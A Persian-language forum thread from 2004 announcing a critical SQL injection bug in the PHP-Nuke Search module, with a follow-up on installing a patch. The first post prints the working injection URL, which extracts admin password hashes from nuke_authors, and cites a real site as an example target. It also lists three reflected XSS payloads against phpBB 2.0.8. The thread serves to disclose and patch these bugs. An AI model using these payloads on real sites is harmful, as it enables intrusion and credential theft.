جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين

amirfigo_62 · Jul 17, 2004

جديترين باگ در PHPNUKE
نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3
درجه : critical
نويسنده : Janek Vind
در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD5 مدير سايت را به نفوذگر ميدهد
كد اكسپلويت :

کد:

modules.php?name=Search&amp;type=comments&amp;
query=not123exists&amp;instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

مثال :
http://www.dailywireless.org/module...LECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد
دريافت سيستم امنيتي مشهدتيم :‌www.mashhadteam.com/dn/nukehackertrap.rar

بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد

همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از‌:

کد:

http://localhost/phpbb208/faq.php?
faq[0][0]=f00&lt;script>alert(document.cookie);&lt;/script>bar&amp;faq[0][1]=amir

و

کد:

http://localhost/phpbb208/faq.php?mode=bbcode&amp;
faq[0][0]=f00&lt;script>alert(document.cookie);&lt;/script>bar&amp;faq[0][1]=amir

و

کد:

http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&amp;category_rows[0][cat_title]=amir&lt;script>alert(document.cookie);&lt;/script>
&amp;category_rows[0][cat_order]=99

------------------
عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد
www.MashhadTeam.com

Ashioone007 · Jul 18, 2004

من patch مشهد تيم رو دريافت كردم ولي نمي تونم در كپوم قسمت بايد آپلود كنم
ممنون مي شم منو راهنمايي كنيد

amirfigo_62 · Jul 18, 2004

سلام
patch رو از ادرس : www.mashhadteam.com/dn/patch1.zip دريافت كنيد
يك سري پوشه مثل modules - includes داره كه خوب بايد فايلاش جايگزين قبليا بشه فايل هايي هم كه در شاخه اصلي بايد باشه مثل mainfile.php - index.php هم به همين صورت وقتي دارين فايلا رو اپلود ميكنيد كافيه موقعي كه از شما سوال ميشه ميخواين فايل ها over right بشه شما yes to all رو بزنيد تا بصورت كامل patch نصب بشه مثلا اگه فايل class_sql_inject.php رو از پوشه includes اپلود نكنيد سايت شما پيغام خطا ميده چون در mainfile.php تعريف شده كه اول اين فايل فراخواني بشه تا تست كنه ادرسي كه درخواست شده معتبر هست و از كدهاي غير مجاز توش استفاده ميشه يا نه
موفق باشيد
امير

جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين

amirfigo_62

Member

Ashioone007

Member

amirfigo_62

Member

آخرین مطالب مجیدآنلاین

جدیدترین ارسال ها